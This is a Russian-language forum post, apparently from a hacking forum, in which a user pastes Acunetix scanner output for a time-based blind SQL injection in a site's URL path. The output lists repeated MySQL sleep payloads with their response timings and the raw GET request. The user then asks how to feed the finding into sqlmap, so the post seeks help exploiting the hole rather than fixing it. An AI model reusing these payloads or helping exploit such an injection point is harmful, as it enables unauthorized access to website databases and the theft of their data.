Показать сообщение отдельно

  #1027  
Старый 27.04.2020, 00:13
vladF
Новичок
Регистрация: 05.12.2018
Сообщений: 16
Провел на форуме:
6200

Репутация: 0
По умолчанию

Всем привет. Acunetix выдал такое:

Код:
Уязвимость затрагивает https://www.site.com/ , /  /  /[*] /  /

Обнаружено слепым SQL-инъекцией

Детали атаки
arrow_drop_up
Вход фрагмента пути /  /  /[*] /  / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены

тесты :
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31

Первоначальное значение: doe-spiransuchor

HTTP-запрос
arrow_drop_up
GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /
Как правильно скормить в sqlmap?
 
Ответить с цитированием